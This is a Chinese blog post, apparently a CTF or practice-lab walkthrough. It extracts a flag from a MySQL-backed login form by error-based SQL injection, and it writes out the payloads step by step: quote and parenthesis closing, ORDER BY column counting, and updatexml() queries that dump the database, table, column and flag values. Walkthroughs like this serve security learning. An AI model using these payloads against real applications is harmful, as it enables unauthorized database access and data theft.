直接输入帐号,密码,zkz,zkz,显示正常
然后输入
zkz
zkz' and 666=666 #
显示不正常
然后试试加上括号闭合,输入
zkz
zkz') and 666=666 #
成功显示了
然后就猜字段了,输入
zkz
zkz') and 666=666 order by 5 #
显示错误
然后继续猜字段,猜出字段为2
然后联合查询找回显点,输入
zkz
zkz') and 666=888 union all select 1,2 #
然后发现没有回显点,有点懵
然后试试用updatexml()函数试试,输入
zkz
zkz') and updatexml(1,concat(0x7e,(select database()),0x7e),3) #
发现爆出数据库,security
然后就差表名,输入
zkz
zkz') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()limit 0,1),0x7e),3) #
得到表名emails
继续查表名,查到referers,uagents,users,zkaq
然后就查字段名,输入
zkz
zkz') and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='zkaq' limit 0,1),0x7e),3) #
查到字段flag,然后继续查,查到zKaQ
然后就是差内容了,输入
zkz
zkz') and updatexml(1,concat(0x7e,(select flag from zkaq limit 0,1),0x7e),3) #
查到内容1,继续查,查到2,猜测flag不在这个字段,去查下一个字段,输入
zkz
zkz') and updatexml(1,concat(0x7e,(select zKaQ from zkaq limit 0,1),0x7e),3) #
查到
zKaQ-ErR0rBaS4d
然后继续查,查到
zKaQ-ErrOrSqLInJ4ct1ons
zKaQ-Tw1st,zKaQ-D0ub1eQuot4s
zKaQ-B1indB7s4d
zKaQ-SqLInJectOnE
zKaQ-W1dech4rSQL
zKaQ-adds1ash4s
zKaQ-Slash4sSQl
zKaQ-D4la7Bas4d
zKaQ-T1m4B3s4d
zKaQ-T1m4Ba3edTh2ee
zKaQ-HtTpH4ader
zKaQ-HtTpR4FeRer
zKaQ-HtTpCo0kie
zKaQ-P0stErr0rB4sed
zKaQ-P0stD0ubl4
zKaQ-HacKTw1st
然后就一个一个去试了。试出flag是zKaQ-HacKTw1st
来源:CSDN
作者:吃遍全国海底捞
链接:https://blog.csdn.net/NiFeng_ShouHu/article/details/104100477